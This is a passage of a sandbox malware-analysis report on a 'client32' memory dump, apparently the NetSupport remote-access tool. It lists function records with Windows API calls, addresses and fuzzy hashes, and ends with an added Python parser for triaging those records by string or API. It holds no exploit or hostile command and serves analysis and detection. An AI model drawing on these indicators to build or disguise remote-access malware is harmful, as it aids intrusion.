• Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
• Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
• Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
APIs
  • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
  • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
  • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
• std::exception::exception.LIBCMT ref: 1105F2E3
• __CxxThrowException@8.LIBCMT ref: 1105F2F8
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID:
• API String ID: 1338273076-0
• Opcode ID: 0e2708137e7841a047f0bf711e132c29747f48898e4f83a7bcb8bcbbdfe207f3
• Instruction ID: 27c1c6abb081d98236a55b9714def59ee0ae50ea33d11c9255898d7f6f2dc0b9
• Opcode Fuzzy Hash: 0e2708137e7841a047f0bf711e132c29747f48898e4f83a7bcb8bcbbdfe207f3
• Instruction Fuzzy Hash: CD518DB6A00249AFDB50CF58D880E9AF7F9EB88214F04C56EEC599B341D775F901C7A1
APIs
  • Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(75A7795C,?,00000104,75A7795C), ref: 11141187
  • Part of subcall function 1116067B: __fsopen.LIBCMT ref: 11160688
• GetLastError.KERNEL32(?,00000000,75A7795C,00000000), ref: 11141275
• Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A7795C,00000000), ref: 11141285
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
• String ID:
• API String ID: 3768737497-0
• Opcode ID: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
• Instruction ID: 103134ba4653f8fc15402f07188d85fc6b934bc741d6c344a8ba55e5f3ec2e88
• Opcode Fuzzy Hash: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
• Instruction Fuzzy Hash: 1A11E5B6A00215ABDB119F94C9C0E6FF378EB45A69F304165ED04D7200E775BD0287A3
APIs
• RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,75A78400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
• Instruction ID: 5fbfdb2e62506a22be8d6102f6026bab3dbcb22e3eaadfb442edbe5e81d15758
• Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
• Instruction Fuzzy Hash: C711B4717242475BE7118D14E590AAEFB6AEFC523EF20812AE59647908C2319443C763
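The function records above (API calls with their `ref:` address, the dump the code came from, the API/String ID pair and the opcode and instruction fuzzy hashes) follow a fixed layout, so a practitioner pivoting from an indicator such as `\\.\NSWFPDrv` or `nslsp.dll` to the functions that reference it can parse them mechanically instead of scrolling. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox or NetSupport code; the parser, its field names and the embedded sample (two records copied from this section, with indentation and the "Download File" link text stripped) are the editor's own constructions.

```python
import re
from typing import Dict, List

# Section headers exactly as the report page prints them.
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}

# One API line, with or without the "Part of subcall function" prefix:
#   • LoadLibraryA.KERNEL32(nslsp.dll,...), ref: 1101519E
#   • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Every other "• Key: value" bullet (Source File, Associated, API ID, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")

# Constructed sample: two records in the page's layout, values copied from
# the report text (this is test input assembled for the example).
SAMPLE_REPORT = """
APIs
• LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102E930,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1101519E
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: nslsp.dll
• API String ID: 1029625771-3933918195
APIs
  • Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(75A7795C,?,00000104,75A7795C), ref: 11141187
  • Part of subcall function 1116067B: __fsopen.LIBCMT ref: 11160688
• GetLastError.KERNEL32(?,00000000,75A7795C,00000000), ref: 11141275
• Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A7795C,00000000), ref: 11141285
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
• String ID:
• API String ID: 3768737497-0
"""


def parse_report(text: str) -> List[Dict]:
    """Return one dict per 'APIs' block: its API calls, fields and dumps."""
    records: List[Dict] = []
    rec: Dict = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":               # each record opens with this header
                rec = {"apis": [], "fields": {}, "associated": []}
                records.append(rec)
            section = line
        elif not line or not rec:
            continue                         # blank line, or text before first record
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group("args")
                rec["apis"].append({"name": m.group("name"),
                                    "module": m.group("module"),
                                    "args": args.split(",") if args else [],
                                    "ref": m.group("ref"),
                                    "subcall": m.group("sub")})  # None = direct call
        else:
            m = FIELD_RE.match(line)
            if m and m.group("key") == "Associated":
                rec["associated"].append(m.group("val"))
            elif m:
                rec["fields"][m.group("key")] = m.group("val")
    return records


def direct_calls(rec: Dict) -> List[str]:
    """APIs the function calls itself (subcall lines excluded)."""
    return [a["name"] for a in rec["apis"] if a["subcall"] is None]


def find_records(records: List[Dict], needle: str) -> List[Dict]:
    """Records whose String ID, API names or API arguments contain needle."""
    n = needle.lower()
    hits = []
    for rec in records:
        hay = [rec["fields"].get("String ID", "")]
        for api in rec["apis"]:
            hay.append(api["name"])
            hay.extend(api["args"])
        if any(n in h.lower() for h in hay):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in find_records(parse_report(SAMPLE_REPORT), "nslsp"):
        print(rec["fields"]["API String ID"], direct_calls(rec))
```

Feeding the full page text to `parse_report` gives one record per function; the "API String ID" and "Instruction Fuzzy Hash" fields are the values to carry into a similarity search against other NetSupport samples, while `find_records` answers the usual triage question of which functions touch a given string or API.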